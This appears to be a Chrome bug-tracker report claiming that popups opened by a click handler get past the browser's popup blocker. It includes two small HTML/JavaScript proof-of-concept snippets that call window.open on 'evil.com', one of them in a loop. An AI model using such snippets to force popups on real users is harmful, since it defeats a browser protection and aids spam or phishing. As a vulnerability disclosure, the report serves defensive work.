UserAgent: Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
Steps to reproduce the problem:
First visit this link https://jsfiddle.net/zn2jkvd2/.
OR
Save this code
---
<script>window.open('http://www.evil.com','width=150,height=150')</script>
----
as html and open the html file in chrome browser.
Browser block popups.(If not then manually turn on popup blocker )
Next
Visit this link https://jsfiddle.net/g8xom7qb/
OR
save this code
--------
<script>
function makePopups(){
for (i=1;i<6;i++) {
window.open('http://www.evil.com','spam'+i,'width=150,height=150');
}
}
</script>
<body>
<a href="#" onclick="makePopups()">Spam</a>
------
as html and open the file and click on 'Spam' ,Browser show popup blocked but popup successfully executed.
What is the expected behavior?
Browser should not allows popup if the popup blocker is on.
What went wrong?
Browser allows popup if the popup blocker is on.
Thus This Bypass the browser popup security filter.
Did this work before? N/A
Chrome version: 57.0.2935.0 Channel: n/a
OS Version: Win7
Flash Version: Shockwave Flash 10.2 r159
|
Deleted:
popby.avi
9.0 MB
|
Comment 1 by anasmahm...@gmail.com
, Apr 26 2017